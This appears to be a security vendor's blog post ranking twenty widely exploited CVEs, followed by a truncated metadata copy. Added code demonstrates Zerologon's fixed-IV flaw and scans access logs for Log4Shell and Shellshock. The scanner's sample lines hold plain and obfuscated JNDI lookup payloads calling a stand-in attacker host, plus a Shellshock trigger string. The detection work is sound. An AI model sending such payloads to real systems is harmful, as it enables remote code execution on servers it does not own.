The earlier blog posts gave an overview of the **vulnerability threat landscape**, covering vulnerabilities that are either remotely exploitable or most targeted by attackers. A quick recap: we focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, with the time to CISA being down to 8 days, and on the vulnerabilities most targeted by threat actors, malware & ransomware.
This blog post focuses on **Qualys’ Top Twenty Vulnerabilities** targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.
Some of these vulnerabilities are part of the recent [**CISA Joint Cybersecurity Advisory (CSA)**](<https://www.cisa.gov/news-events/alerts/2023/08/03/cisa-nsa-fbi-and-international-partners-release-joint-csa-top-routinely-exploited-vulnerabilities>), published on August 3, 2023; you can access it from [**2022 Top Routinely Exploited Vulnerabilities**](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a>).
Read on.
## Stats on the Top 20 Vulnerable Vendors & By-Products
**Fig 1. Top Vulnerable Vendor**
**Fig 2. Top Vulnerable Products**
## Top Twenty Most Targeted by Attackers
### 1\. **CVE-2017-11882: Microsoft Office Memory Corruption Vulnerability**
**Vulnerability Trending Over Years: 2018, 2020, 2021, 2022, 2023 (79 times)**
It was exploited by 467 Malware, 53 Threat Actors, and 14 Ransomware and was trending in the wild as recently as August 31, 2023.
**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**
**Qualys Vulnerability Detection (QID): 110308**
Disclosed in 2017, CVE-2017-11882 is a **significant memory corruption vulnerability** in Microsoft Office's Equation Editor. It could enable an attacker to execute arbitrary code under the current user's permissions.
If the user has administrative rights, the attacker could gain complete control of the system, install programs, alter data, or create new user accounts with full privileges. The vulnerability is exploited when the user opens a specially crafted file, typically sent via email or hosted on a compromised website.
It has been exploited primarily in various cyber-attacks and espionage campaigns.
### 2\. **CVE-2017-0199: Microsoft WordPad Remote Code Execution Vulnerability**
**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (59 times)**
It was exploited by 93 Malware, 53 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.
**Qualys Vulnerability Detection (QID): 110297**
**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**
CVE-2017-0199 is a notable remote code execution vulnerability that affects specific Microsoft Office and WordPad versions when they parse specially crafted files. It is the vulnerability most favored by malware, threat actors, and ransomware.
If successfully exploited, an attacker could execute arbitrary code in the current user's security context, potentially taking control of the system. Exploitation involves a user opening or previewing a maliciously crafted file, often sent via email. Microsoft has addressed this vulnerability by correcting how Office and WordPad parse these files and by enabling certain API functionality in Windows for further resolution.
### 3\. **CVE-2012-0158: Vulnerability in Windows Common Controls Could Allow RCE**
**Vulnerability Trending Over Years: 2013, 2020, 2021, 2023 (33 times)**
It was exploited by 63 Malware, 45 Threat Actors, 2 Ransomware and was trending in the wild as recently as August 31, 2023.
**Qualys Vulnerability Detection (QID): 90793**
CVE-2012-0158 is a substantial remote code execution vulnerability in the Windows Common Controls. An attacker can exploit the flaw by constructing a specially crafted webpage. When the webpage is viewed, the vulnerability can allow remote code execution, potentially granting the attacker the same rights as the logged-on user.
If the user has administrative privileges, this could mean total control of the affected system. Disclosed in 2012, this vulnerability has been notably exploited in various cyber-attacks, enabling attackers to install programs, manipulate data, or create new accounts with full user rights.
### 4\. **CVE-2017-8570: Microsoft Office Remote Code Execution Vulnerability**
**Vulnerability Trending Over Years: 2018, 2020, 2023 (25 times)**
It was exploited by 52 Malware and 11 Threat Actors and was trending in the wild as recently as September 2, 2023.
**Qualys Vulnerability Detection (QID): 110300**
CVE-2017-8570 is a significant remote code execution vulnerability in Microsoft Office and WordPad. It involves the way these applications handle specially crafted files. It can be exploited by an attacker who convinces a user to open a specially designed file, potentially allowing the attacker to run arbitrary code on the victim's machine with the same privileges as the logged-in user and serving as a downloader to other high-profile malware.
### 5\. **CVE-2020-1472: Zerologon - An Unauthenticated Privilege Escalation to Full Domain Privileges**
**Vulnerability Trending Over Years: 2020, 2021, 2022, 2023 (56 times)**
It was exploited by 18 Malware, 16 Threat Actors, 11 Ransomware and was trending in the wild as recently as September 4, 2023.
**Qualys Vulnerability Detection (QID): 91680**
**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**
CVE-2020-1472, or **Zerologon**, is a severe vulnerability in Microsoft's Netlogon Remote Protocol due to a flawed implementation of AES-CFB8 encryption.
The use of a fixed initialization vector, combined with the acceptance of unencrypted sessions, allows an attacker to impersonate a server and compromise the entire Windows domain, taking control of all the Active Directory identity services.
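As an added illustration (not code from the original post or from Qualys), the toy below shows why a fixed IV is a design flaw in CFB8 mode. A truncated keyed SHA-256 stands in for the AES forward transform (an assumption made so the block runs with the standard library only; CFB only ever runs the block cipher in the encrypt direction). It encrypts an all-zero message with a fixed all-zero IV under many keys and counts how often the ciphertext comes out all zero: once the first keystream byte happens to be zero (about 1 key in 256), the shift register never changes and every following byte is zero too, regardless of message length. With a fresh random IV per message the same count drops to zero, which is the property a correctly used CFB8 construction relies on.

```python
import hashlib
import os

BLOCK_SIZE = 16  # AES block size in bytes
FIXED_ZERO_IV = bytes(BLOCK_SIZE)


def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for the AES forward transform (assumption: a keyed hash truncated to
    one block is NOT a cipher, but it behaves like a pseudo-random function, which is
    all that CFB mode needs to demonstrate the mode-level property)."""
    return hashlib.sha256(key + block).digest()[:BLOCK_SIZE]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8: each plaintext byte is XORed with the first byte of E(key, shift_register);
    the register then drops its oldest byte and appends the new ciphertext byte."""
    shift = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream_byte = toy_block_encrypt(key, bytes(shift))[0]
        c = p ^ keystream_byte
        out.append(c)
        shift = shift[1:] + bytes([c])  # if c == 0 and the register was all zero, it stays so
    return bytes(out)


def fixed_iv(_key: bytes) -> bytes:
    """The flawed choice: the same all-zero IV for every message."""
    return FIXED_ZERO_IV


def fresh_iv(_key: bytes) -> bytes:
    """The sound choice: an unpredictable IV per message."""
    return os.urandom(BLOCK_SIZE)


def count_zero_ciphertexts(num_keys: int, iv_for_key, msg_len: int = 8) -> int:
    """Count how many of num_keys distinct (constructed) keys turn an all-zero
    plaintext into an all-zero ciphertext under the IV policy iv_for_key."""
    count = 0
    for i in range(num_keys):
        key = i.to_bytes(4, "big")  # constructed key material, not real secrets
        ct = cfb8_encrypt(key, iv_for_key(key), bytes(msg_len))
        if ct == bytes(msg_len):
            count += 1
    return count


if __name__ == "__main__":
    n = 8192
    print(f"fixed zero IV : {count_zero_ciphertexts(n, fixed_iv)} of {n} keys (expect ~{n // 256})")
    print(f"fresh random IV: {count_zero_ciphertexts(n, fresh_iv)} of {n} keys (expect 0)")
```

The count under the fixed IV sits near 1/256 of the keys because the all-zero output depends only on the first keystream byte; nothing in the construction is length-dependent once that byte is zero. A fresh IV makes the first register state unpredictable to anyone who does not hold the key, so no such degenerate output can be produced on demand.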
### 6\. **CVE-2017-0144, CVE-2017-0145, CVE-2017-0143: Windows SMBv1 Remote Code Execution Vulnerability (WannaCry, Petya)**
**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (50 times)**
It was exploited by 12 Malware, 10 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 1, 2023.
**Qualys Vulnerability Detection (QID): 91361, 91360, 91359, 91345**
Commonly known as MS17-010, or by the Shadow Brokers exploit names "ETERNALBLUE," "ETERNALSYNERGY," and "ETERNALROMANCE," this is a remote code execution vulnerability in Microsoft's Server Message Block 1.0 (SMBv1) protocol.
The vulnerability arises from how SMBv1 handles specific requests, allowing an attacker (usually authenticated) to send a specially crafted packet to an SMBv1 server and execute code on the target server.
It was infamously exploited in the widespread WannaCry ransomware attack in 2017, leading to global data encryption and ransom demands.
### 7\. **CVE-2012-1723: Java Applet Field Bytecode Verifier Cache Remote Code Execution**
**Vulnerability Trending Over Years: 2023 (6 times)**
It was exploited by 91 Malware, 8 Threat Actors, 41 Ransomware and was trending in the wild as recently as August 17, 2023.
**Qualys Vulnerability Detection (QID): 120274**
CVE-2012-1723 is a substantial vulnerability found in the Java Runtime Environment. It can be exploited through a malicious web page hosting a rogue Java applet.
The issue, originating from a type-confusion error in the "HotSpot" component, allows untrusted Java applets or applications to bypass the Java sandbox security restrictions and execute arbitrary code on a user's system.
### 8\. **CVE-2021-34473, CVE-2021-34523, CVE-2021-31207: Microsoft Exchange Server RCE (ProxyShell)**
**Vulnerability Trending Over Years: 2021, 2022, 2023 (39 times)**
It was exploited by 12 Malware, 20 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 2, 2023.
**Qualys Vulnerability Detection (QID): 50114, 50111, 50112**
**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. **
ProxyShell, a chain of vulnerabilities that impacts on-premises Microsoft Exchange Servers, is widely used for email and associated services globally.
These vulnerabilities exist in the Microsoft Client Access Service (CAS), typically running on port 443 in IIS, often exposed to the internet to allow users to access their email remotely. This exposure has led to widespread exploitation by threat actors deploying web shells to execute arbitrary code on compromised devices. They allow an actor to bypass authentication and execute code as a privileged user.
### 9\. **CVE-2019-11510: Pulse Secure Pulse Connect Secure SSL VPN Unauthenticated Path**
**Vulnerability Trending Over Years: 2019, 2020, 2023 (53 times)**
It was exploited by 13 Malware, 18 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 4, 2023.
**Qualys Vulnerability Detection (QID): 38771**
**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**
CVE-2019-11510 is a critical vulnerability found in Pulse Connect Secure, a widely used VPN solution by Pulse Secure. The flaw enables an unauthenticated, remote attacker to exploit a specific endpoint and read arbitrary files on the system, including sensitive information such as private keys and user credentials.
It can provide an attacker with access to the corporate network comparable to that of a legitimate user.
### 10\. **CVE-2021-44228: Apache Log4j Remote Code Execution Vulnerability**
**Vulnerability Trending Over Years: 2021, 2022, 2023 (77 times)**
It was exploited by 10 Malware, 26 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.
**Qualys Vulnerability Detection (QID): 376157, 730297**
**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**
CVE-2021-44228, or "Log4Shell," is a severe vulnerability in Apache's log4j Java library. The flaw abuses the 'lookups' feature of log4j: a specially crafted input triggers a JNDI lookup that references a remote Java class via an LDAP server, leading to Remote Code Execution.
The issue is particularly dangerous because any attacker-controlled input that contains the lookup syntax and is logged by log4j can trigger the lookup, resulting in the loading and execution of an attacker-defined remote Java class, and thus Remote Code Execution (RCE), on the server running the vulnerable log4j instance.
### 11\. **CVE-2014-6271: Shellshock – Linux Bash Vulnerability**
**Vulnerability Trending Over Years: 2014, 2016, 2017, 2020, 2021, 2022, 2023 (70 times)**
It was exploited by 18 Malware and 1 Threat Actor and was trending in the wild as recently as September 2, 2023.
**Qualys Vulnerability Detection (QID): 122693, 13038, 150134**
Shellshock (CVE-2014-6271) is a critical vulnerability affecting the Bash shell in many Linux, Unix, and Mac OS systems. It allows remote code execution by misusing Bash's processing of environment variables, enabling attackers to append and execute malicious commands. It has a high severity score since it can impact multiple devices and applications, risking unauthorized data access or service disruption.
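Both Log4Shell (item 10) and Shellshock (item 11) share a defender-friendly trait: the trigger has to travel through data the server records, so web access logs are a practical place to look for exploitation attempts. The scanner below is an added example, not code from the original post or from Qualys, and runs over a few constructed Apache-style log lines embedded in the block. For Log4Shell it first collapses the common lookup obfuscations (`${lower:j}`, `${upper:n}`, and the default-value form `${anything:-j}`) until the text stops changing, so that a hidden `${jndi:` token is visible; for Shellshock it looks for the Bash function-definition prefix `() {` arriving in request data. The log lines, hosts, and paths are all made up for the example.

```python
import re

# Constructed sample access-log lines (not from the original post). Line 2 carries a
# plain Log4j JNDI lookup, line 3 the same lookup obfuscated, and line 4 the Shellshock
# function-definition pattern in the User-Agent field; line 1 is benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:03 +0000] "GET /login HTTP/1.1" 200 77 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 77 "-" '
    '"${${lower:j}${upper:N}di:${::-l}dap://attacker.example/x}"',
    '10.0.0.7 - - [25/Sep/2014:09:30:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 10 "-" '
    '"() { :; }; /bin/echo probe"',
]

# Log4j lookup forms used to hide the literal "jndi" token. Both patterns only match an
# innermost lookup (no braces inside), so nested forms are peeled one layer per pass.
_CASE_LOOKUP = re.compile(r'\$\{(?:lower|upper):([^{}]*)\}', re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r'\$\{[^{}]*?:-([^{}]*)\}')
# After normalisation the lookup reads "${jndi:<scheme>://...}".
_JNDI = re.compile(r'\$\{jndi:[^}]*\}?')
# Shellshock: an exported Bash function definition "() {" arriving in request data.
_SHELLSHOCK = re.compile(r'\(\)\s*\{[^"]*')


def normalize_lookups(text: str) -> str:
    """Collapse Log4j lookup obfuscation until nothing changes, then lowercase."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text.lower()


def scan(lines):
    """Return one finding per suspicious line: which rule fired and the evidence seen."""
    findings = []
    for lineno, raw in enumerate(lines, start=1):
        norm = normalize_lookups(raw)
        m = _JNDI.search(norm)
        if m:
            findings.append({"line": lineno, "rule": "log4shell", "evidence": m.group(0)})
            continue
        m = _SHELLSHOCK.search(raw)
        if m:
            findings.append({"line": lineno, "rule": "shellshock", "evidence": m.group(0).strip()})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f['line']}: {f['rule']} -> {f['evidence']}")
```

Matching on the normalised text rather than the raw line is the part worth keeping: a rule that only looks for the literal `${jndi:` misses line 3, while the peeling loop turns it into the same evidence string as line 2. The same normaliser can feed a SIEM rule or a WAF log review; a hit is a signal to check whether the receiving application logged that field with a vulnerable log4j, not proof of compromise on its own.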
### 12\. **CVE-2018-8174: Windows VBScript Engine Remote Code Execution Vulnerability**
**Vulnerability Trending Over Years: 2018, 2020, 2023 (30 times)**
It was exploited by 21 Malware, 10 Threat Actors, and 7 Ransomware and was trending in the wild as recently as September 4, 2023.
**Qualys Vulnerability Detection (QID): 91447**
CVE-2018-8174 is a critical vulnerability in Microsoft Windows' VBScript Engine, enabling remote code execution. Triggered by viewing a malicious website with Internet Explorer or opening a rigged Microsoft Office document, this flaw allows an attacker to manipulate memory objects and execute code.
The attacker can fully control the system if the user has administrative rights.
### 13\. **CVE-2013-0074: Microsoft Silverlight Could Allow Remote Code Execution**
**Vulnerability Trending Over Years: 2023 (8 times)**
It was exploited by 62 Malware and 50 Ransomware and was trending in the wild as recently as August 20, 2023.
**Qualys Vulnerability Detection (QID): 90870**
CVE-2013-0074 is a remote code execution vulnerability in Microsoft Silverlight, which permits a crafted Silverlight application to access memory unsafely, thereby leading to the execution of arbitrary code under the current user’s security context.
If the user has admin rights, the attacker could install programs, alter or delete data, or create new accounts with full privileges. The user can be deceived into visiting a malicious website or clicking on a link, commonly delivered through an email or instant message.
### 14\. **CVE-2012-0507: Oracle Java SE Remote Java Runtime Environment Vulnerability**
**Vulnerability Trending Over Years: 2023 (10 times)**
It was exploited by 66 Malware, 3 Threat Actors, and 42 Ransomware and was trending in the wild as recently as July 26, 2023.
**Qualys Vulnerability Detection (QID): 119956**
CVE-2012-0507 is a critical vulnerability in the Java Runtime Environment (JRE) allowing untrusted Java applets to execute arbitrary code outside the Java sandbox. Originating from a flaw in the AtomicReferenceArray class implementation, **this vulnerability was exploited by the Flashback Trojan in 2012**, which led to one of the most significant known malware attacks on Apple devices. Attackers can exploit this vulnerability by tricking users into visiting a malicious website hosting a Java applet.
### 15\. **CVE-2019-19781: Citrix ADC and Citrix Gateway - Remote Code Execution (RCE) Vulnerability**
**Vulnerability Trending Over Years: 2020, 2022, 2023 (60 times)**
It was exploited by 11 Malware, 12 Threat Actors, and 10 Ransomware and was trending in the wild as recently as September 4, 2023.
**Qualys Vulnerability Detection (QID): 372305, 150273**
**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**
CVE-2019-19781, or "Shitrix," is a significant vulnerability associated with Citrix Application Delivery Controller (ADC) and Citrix Gateway, allowing unauthenticated attackers to perform arbitrary code execution, granting them access to internal network resources.
The flaw resides in the VPN component of the affected products, enabling directory traversal and giving attackers both read and write access to the underlying file system.
### 16\. **CVE-2018-0802: Microsoft Office Memory Corruption Vulnerability**
**Vulnerability Trending Over Years: 2021, 2022, 2023 (19 times)**
It was exploited by 29 Malware and 24 Threat Actors and was trending in the wild as recently as September 2, 2023.
**Qualys Vulnerability Detection (QID): 110310**
CVE-2018-0802 is a critical vulnerability within Microsoft Office and WordPad, which, if exploited, allows remote code execution via specially crafted files.
Attackers can run arbitrary code in the current user's context, potentially taking over the system if the user holds administrative rights. This vulnerability was notably used in targeted attacks and was being actively exploited before Microsoft released a security update in January 2018 that correctly handles objects in memory, resolving the issue.
### 17\. **CVE-2021-26855: Microsoft Exchange Server Authentication Bypass (RCE)**
**Vulnerability Trending Over Years: 2021, 2023 (46 times)**
It was exploited by 19 Malware, 22 Threat Actors, and 9 Ransomware and was trending in the wild as recently as September 2, 2023.
**Qualys Vulnerability Detection (QID): 50107, 50108**
**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**
CVE-2021-26855, a part of the ProxyLogon exploit chain, is a server-side request forgery (SSRF) vulnerability in Microsoft Exchange Server that enables attackers to bypass authentication mechanisms and impersonate users.
The flaw allows arbitrary HTTP requests, granting access to users' mailboxes and enabling information theft. It has been widely exploited by various threat actors, leading to emergency patches by Microsoft.
### 18\. **CVE-2019-2725: Oracle WebLogic Affected by Unauthenticated RCE Vulnerability**
**Vulnerability Trending Over Years: 2019, 2020, 2022, 2023 (53 times)**
It was exploited by 10 Malware, 4 Threat Actors, 9 Ransomware and was trending in the wild as recently as September 4, 2023.
**Qualys Vulnerability Detection (QID): 150267, 87386**
CVE-2019-2725 is a severe remote code execution vulnerability in Oracle WebLogic Server that allows unauthenticated attackers to execute arbitrary code over a network without user interaction. It was quickly weaponized to install cryptocurrency miners.
### 19\. **CVE-2018-13379: Fortinet FortiGate (FortiOS) System File Leak through Secure Sockets Layer (SSL)**
**Vulnerability Trending Over Years: 2020, 2021, 2023 (41 times)**
It was exploited by 6 Malware, 13 Threat Actors, 6 Ransomware and was trending in the wild as recently as August 30, 2023.
**Qualys Vulnerability Detection (QID): 43702**
**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. **
CVE-2018-13379 is a path traversal vulnerability found in the Fortinet FortiOS SSL VPN web portal. An unauthenticated attacker can read sensitive system files via specially crafted HTTP requests. The exploit could expose SSL VPN session data, leading to more severe attacks.
### 20\. **CVE-2021-26084: Atlassian Confluence Server Webwork OGNL Injection RCE Vulnerability**
**Vulnerability Trending Over Years: 2021, 2022, 2023 (35 times)**
It was exploited by 8 Malware, 6 Threat Actors, and 8 Ransomware and was trending in the wild as recently as September 2, 2023.
**Qualys Vulnerability Detection (QID): 730172, 150368, 375839**
**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**
CVE-2021-26084 is a critical vulnerability in Atlassian's Confluence Server and Data Center, specifically within the Webwork OGNL component. This vulnerability can enable an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance, potentially compromising system integrity.
## TruRisk Dashboard
Qualys VMDR helps organizations get instant visibility into high-risk and top twenty vulnerabilities.
**Fig 3. Qualys VMDR TruRisk Dashboard for Top 20 Vulnerabilities**
The **Qualys VMDR TruRisk Dashboard** gives organizations complete visibility into open vulnerabilities, centered on the organization’s global risk score and its high-risk vulnerabilities. Once you have identified the vulnerable assets for these top twenty CVEs and prioritized them among your remediation owners, you can use Qualys Patch Management to instantly reduce the risk.
The VMDR TruRisk Dashboard is available for download: [Download the Dashboard Here](<https://blog.qualys.com/wp-content/uploads/2023/09/Qualys_VMDR_TruRisk__Dashboard.zip>)
## Key Insights & Takeaways
* In the current Vulnerability Threat Landscape, identifying open vulnerabilities and effective remediation is the highest priority for every defender.
* Among the vast number of CVEs available, you need to know which weaponized high-risk vulnerabilities are actively targeted by Threat Actors, Malware, and ransomware families.
* Use multi-dimensional Threat Intelligence to prioritize vulnerabilities rather than implementing multiple siloed threat approaches.
* The Qualys VMDR with TruRisk automatically prioritizes vulnerabilities exploited in the wild with a TruRisk score of 90 or higher, greatly simplifying the prioritization process.
## References
* [Part 1: An In-Depth Look at the Latest Vulnerability Threat Landscape](<https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>)
* [Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)](<https://blog.qualys.com/vulnerabilities-threat-research/2023/07/18/part-2-an-in-depth-look-at-the-latest-vulnerability-threat-landscape-attackers-edition>)
## Additional Contributors
* **Shreya Salvi, Data Scientist, Qualys**
* **Saeed Abbasi, Product Manager, Vulnerability Research**
{"id": "QUALYSBLOG:6AFD8E9AB405FBE460877D857273A9AF", "vendorId": null, "type": "qualysblog", "bulletinFamily": "blog", "title": "Qualys Top 20 Most Exploited Vulnerabilities", "description": "The earlier blog posts showcased an overview of the **vulnerability threat landscape** that is either remotely exploited or most targeted by attackers._ _A quick recap \u2013 We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.\n\nThis blog post will focus on **Qualys\u2019 Top Twenty Vulnerabilities, **targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.\n\nSome of these vulnerabilities are part of the recent [**CISA Joint Cybersecurity Advisory (CSA)**](<https://www.cisa.gov/news-events/alerts/2023/08/03/cisa-nsa-fbi-and-international-partners-release-joint-csa-top-routinely-exploited-vulnerabilities>)**,** published on August 3, 2023; you can access it from [**2022 Top Routinely Exploited Vulnerabilities**](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a>)**.**\n\nRead on- \n\n## Stats on the Top 20 Vulnerable Vendors & By-Products\n\n**Fig 1. Top Vulnerable Vendor**\n\n**Fig 2. Top Vulnerable Products**\n\n## Top Twenty Most Targeted by Attackers\n\n### **1. CVE-2017-11882: Microsoft Office Memory Corruption Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2021, 2022, 2023 (79 times)**\n\nIt was exploited by 467 Malware, 53 Threat Actors, and 14 Ransomware and was trending in the wild as recently as August 31, 2023. 
\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\n**Qualys Vulnerability Detection (QID): 110308**\n\nDisclosed in 2017, CVE-2017-11882 is a **significant memory corruption vulnerability** in Microsoft Office's Equation Editor. It could enable an attacker to execute arbitrary code under the current user's permissions. \n\nIf the user has administrative rights, the attacker could gain complete control of the system, install programs, alter data, or create new user accounts with full privileges. This vulnerability will be exploited if the user opens a specially crafted file, potentially sent via email or hosted on a compromised website.\n\nIt\u2019s been primarily exploited in various cyber-attacks and espionage campaigns.\n\n### 2\\. **CVE-2017-0199: Microsoft Wordpad Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (59 times)**\n\nIt was exploited by 93 Malware, 53 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 110297**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2017-0199 is a notable remote code execution vulnerability that affects specific Microsoft Office and WordPad versions precisely when they parse specially crafted files. This vulnerability is the most favored vulnerability by malware, threat actors, and ransomware. \n\nIf successfully exploited, an attacker could execute arbitrary code in the current user's security context, potentially taking control of the system. Exploitation involves a user opening or previewing a maliciously crafted file, often sent via email. Microsoft has addressed this vulnerability by correcting how Office and WordPad parse these files and by enabling certain API functionality in Windows for further resolution.\n\n### 3\\. 
**CVE-2012-0158: Vulnerability in Windows Common Controls Could Allow RCE**\n\n**Vulnerability Trending Over Years: 2013, 2020, 2021, 2023 (33 times)**\n\nIt was exploited by 63 Malware, 45 Threat Actors, 2 Ransomware and was trending in the wild as recently as August 31, 2023.\n\n**Qualys Vulnerability Detection (QID): 90793**\n\nCVE-2012-0158 is a substantial remote code execution vulnerability in Windows standard controls. An attacker can exploit the flaw by constructing a specially crafted webpage. Upon viewing this webpage, the vulnerability can allow remote code execution, potentially granting the attacker the same rights as the logged-on user. \n\nIf the user has administrative privileges, this could mean total control of the affected system. Disclosed in 2012, this vulnerability has been notably exploited in various cyber-attacks, enabling attackers to install programs, manipulate data, or create new accounts with full user rights.\n\n### 4\\. **CVE-2017-8570: Microsoft Office Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (25 times)**\n\nIt was exploited by 52 Malware 11 Threat Actors and was trending in the wild as recently as September 2, 2023\n\n**Qualys Vulnerability Detection (QID): 110300**\n\nCVE-2017-8570 is a significant remote code execution vulnerability in Microsoft Office and WordPad. It involves the way these applications handle specially crafted files. It can be exploited by an attacker who convinces a user to open a specially designed file, potentially allowing the attacker to run arbitrary code on the victim's machine with the same privileges as the logged-in user and serving as a downloader to other high-profile malware.\n\n### 5\\. 
**CVE-2020-1472: Zerologon - An Unauthenticated Privilege Escalation to Full Domain Privileges**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2022, 2023 (56 times)**\n\nIt was exploited by 18 Malware, 16 Threat Actors, 11 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID):** **91680**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. **\n\nCVE-2020-1472, or **Zerologon, is a severe vulnerability in Microsoft's Netlogon Remote Protocol** due to a flawed implementation of AES-CFB8 encryption.\n\nUsing a fixed initialization vector and accepting unencrypted sessions allows an attacker to impersonate a server and compromise the entire Windows domain. The attacker takes control over all the Active Directory identity services.\n\n### 6\\. **CVE-2017-0144, CVE-2017-0145, CVE-2017-0143: Windows SMBv1 Remote Code Execution Vulnerability WannaCry, Petya**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (50 times)**\n\nIt was exploited by 12 Malware, 10 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 1, 2023.\n\n**Qualys Vulnerability Detection (QID): 91361, 91360, 91359, 91345**\n\nCommonly known as Shadow Broker or MS17-010, or "ETERNALBLUE," or "ETERNALSYNERGY" or "ETERNAL ROMANCE" is a remote code execution vulnerability in Microsoft's Server Message Block 1.0 (SMBv1) protocol.\n\nThe vulnerability arises from how SMBv1 handles specific requests, allowing an attacker(usually authenticated) to send a specially crafted packet to an SMBv1 server, enabling them to execute code on the target server.\n\nIt was infamously exploited in the widespread WannaCry ransomware attack in 2017, leading to global data encryption and ransom demands.\n\n### 7\\. 
**CVE-2012-1723: Java Applet Field Bytecode Verifier Cache Remote Code Execution**\n\n**Vulnerability Trending Over Years: 2023 (6 times)**\n\nIt was exploited by 91 Malware, 8 Threat Actors, 41 Ransomware and was trending in the wild as recently as August 17, 2023.\n\n**Qualys Vulnerability Detection (QID): 120274**\n\nCVE-2012-1723 is a substantial vulnerability found in the Java Runtime Environment. It can be exploited through a malicious web page, hosting a rogue Java applet can be exploited through a malicious web page hosting rogue Java applet.\n\nThe issue, originating from a type-confusion error in the "HotSpot" component, allows untrusted Java applets or applications to bypass the Java sandbox security restrictions and execute arbitrary code on a user's system\n\n### 8\\. **CVE-2021-34473, CVE-2021-34523, CVE-2021-31207: Microsoft Exchange Server RCE (ProxyShell)**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (39 times)**\n\nIt was exploited by 12 Malware, 20 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 50114, 50111, 50112**\n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. **\n\nProxyShell, a chain of vulnerabilities that impacts on-premises Microsoft Exchange Servers, is widely used for email and associated services globally.\n\nThese vulnerabilities exist in the Microsoft Client Access Service (CAS), typically running on port 443 in IIS, often exposed to the internet to allow users to access their email remotely. This exposure has led to widespread exploitation by threat actors deploying web shells to execute arbitrary code on compromised devices. They allow an actor to bypass authentication and execute code as a privileged user.\n\n### 9\\. 
**CVE-2019-11510: Pulse Secure Pulse Connect Secure SSL VPN Unauthenticated Path**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2023 (53 times)**\n\nIt was exploited by 13 Malware, 18 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 38771**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2019-11510 is a critical vulnerability found in Pulse Connect Secure, a widely used VPN solution by Pulse Secure. The flaw enables an unauthenticated, remote attacker to exploit a specific endpoint and read arbitrary files on the system, including sensitive information such as private keys and user credentials.\n\nDue to its severity, It can provide an attacker with similar access to the corporate network as a legitimate user.\n\n### 10\\. **CVE-2021-44228: Apache Log4j Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (77 times)**\n\nIt was exploited by 10 Malware, 26 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 376157, 730297**\n\n**In the 